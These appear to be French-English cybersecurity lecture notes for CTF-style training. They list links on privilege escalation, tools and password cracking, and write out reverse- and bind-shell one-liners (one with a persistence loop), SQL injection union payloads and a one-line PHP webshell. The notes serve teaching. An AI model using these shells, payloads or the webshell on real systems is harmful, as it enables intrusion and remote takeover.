Cybersecurity Lecture notes

This file list interesting link related to computer security (tools, info, tuto, interesting sites, ressources)

Interesting links

• RootMe

• HackTheBox

• Podcast le comptoirsecu

• PayloadsAllTheThings

• Collection of BURP payloads

PrivESC

Windows Privilege Escalation CheatCheet

Linux Privilege Escalation Binary

LinEnum

Unix privesc

Linprivchecker

Monitor linux process

Reserve shell

Ngrok : Exspose ports to Internet

Plink ssh tunnels on windows

Steganography

Aperi'Solve performs layer analysis on image

Tools

CyberChef : Encode and decode data

Download KALI linux live 2020.4

how to crack a password

1. Identify the type of hash

• https://hashes.com/en/tools/hash_identifier

1. Use john the ripper (already installed on kali)

• https://fr.wikipedia.org/wiki/John_the_Ripper

• https://myhackingworld.com/crack-passwords-with-john-the-ripper/

1. Use a custom wordlist on john the ripper

• https://gitlab.com/kalilinux/packages/wordlists/blob/kali/master/rockyou.txt.gz

Reverse/bind shell

#Reverse Shell
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");’
socat file:`tty`,raw,echo=0 TCP-L:port
Bind shell
nc –lvp 4444 –e /bin/bash

#Add a bit of persistence:
while true; do nc –lvp 4444 –e /bin/bash; done

SQL exemples Payloads

https://portswigger.net/web-security/sql-injection/cheat-sheet

user"; --
user" union select 1,2,3,4,@@version; --
user" union select 1,2,3,4,group_concat(schema_name) from information_schema.schemata; --

PHP the most simple webshell

<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }

//Pour aller plus loin : https://github.com/flozz/p0wny-shell
?>

Challenges

ETAPE 1

• HTTP - Headers

• HTTP - User-agent

• Fichiers de sauvegarde -> Astuce : dirb/mutations_common

ETPAE 2

• Path traversal

• File-upload-double-extensions

• File Upload type MIME

• XSS Injection

ETAPE 3

• SQL injection - Authentification

• Injection (SQL blind)

• Injection (SQL String)

String to decode

427261766f207475206120726575737369206c6520636816c6c656e6765

aidhaSBwZXJkdQ==

26237834373b26237834373b26237832303b26237832313b26237832303b26237837343b26237837353b26237832303b26237836313b26237832303b26237837323b26237836353b26237837353b26237837333b26237837333b26237836393b

Wifi challenge

WEP - https://ufile.io/h28b15y2

WPA2 - https://ufile.io/3qfmvxzn